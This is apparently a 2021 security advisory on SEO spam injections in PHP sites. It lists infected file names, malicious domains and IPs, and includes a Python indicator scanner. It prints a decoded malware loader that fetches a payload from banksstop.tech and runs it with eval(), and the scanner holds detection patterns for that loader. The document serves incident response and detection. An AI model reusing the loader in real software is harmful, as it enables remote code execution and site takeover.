How to fix SEO spam injections

Last updated: July 30 2021

Recently we noticed several SEO spam injections following the same pattern, each starting with a set of encoded malicious files.
If you find any of these files inside your root folder, your site is infected: auto_seo.php, accesson.php, wikindex.php, old-index.php, 3index.php. Moreover, any addon sites hosted on the same account will be affected by cross-site contamination.

To perform a cleanup, you may follow the steps described here:
https://guides.magefix.com/2021/06/clean-driverfortnigtly-malware/

After having a closer look, I managed to decode the following strings.

wikindex.php, 3index.php
// Fetches a remote payload selected by the "f" query parameter and runs it through eval()
$ch = curl_init('http://banksstop.tech/'.$_GET['f']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval('?>'.$result);

auto_seo.php
http://28ioh.sgate.xyz/

index.php files are being injected with malware, and hidden .ico files are also randomly installed.
Example: /wp-includes/blocks/column/.81a49ecc.ico

Malicious domains: 28ioh.sgate.xyz, banksstop.tech, hollywoodregistration.xyz.
Malicious IPs: 204.12.207.186, 69.197.184.130 (WholeSale Internet, Inc.).
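
A small scanner for the indicators listed in this article, added here as an example (it is not the article's or the vendor's own tooling). The names scan and build_sample and the sample tree are constructed for illustration, and it checks file names anywhere under the given folder (an assumption, so that addon sites in subfolders are covered). The plain-text host match will not hit files that are still encoded; the file name and hidden .ico checks cover those.

```python
import re
import tempfile
from pathlib import Path

# Indicators copied from the article; extend as new ones appear.
BAD_NAMES = {"auto_seo.php", "accesson.php", "wikindex.php",
             "old-index.php", "3index.php"}
BAD_HOSTS = (b"28ioh.sgate.xyz", b"banksstop.tech",
             b"hollywoodregistration.xyz", b"204.12.207.186", b"69.197.184.130")
HIDDEN_ICO = re.compile(r"^\..+\.ico$")  # e.g. .81a49ecc.ico
# eval() shortly after curl_exec(): the loader shape decoded in the article
REMOTE_EVAL = re.compile(rb"curl_exec\s*\(.{0,200}?eval\s*\(", re.DOTALL)

def scan(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in BAD_NAMES:
            findings.append((rel, "known file name"))
        if HIDDEN_ICO.match(path.name):
            findings.append((rel, "hidden .ico file"))
        if path.suffix not in (".php", ".ico"):
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip it, keep scanning
        findings += [(rel, "references " + h.decode()) for h in BAD_HOSTS if h in data]
        if REMOTE_EVAL.search(data):
            findings.append((rel, "eval of curl response"))
    return sorted(findings)

def build_sample(root):
    samples = {  # constructed tree: one clean file, three suspicious ones
        "index.php": b"<?php echo 'hello'; ?>",
        "wikindex.php": b"<?php $r = curl_exec($ch); eval('?>'.$r);",
        "addon/auto_seo.php": b"<?php $u = 'http://28ioh.sgate.xyz/';",
        "wp-includes/blocks/column/.81a49ecc.ico": b"\x00constructed\x00",
    }
    for rel, body in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan(tmp), sep="\n")
```

To check a real account, call scan() with the path of the account's root folder; every hit is a lead for manual review, not proof on its own.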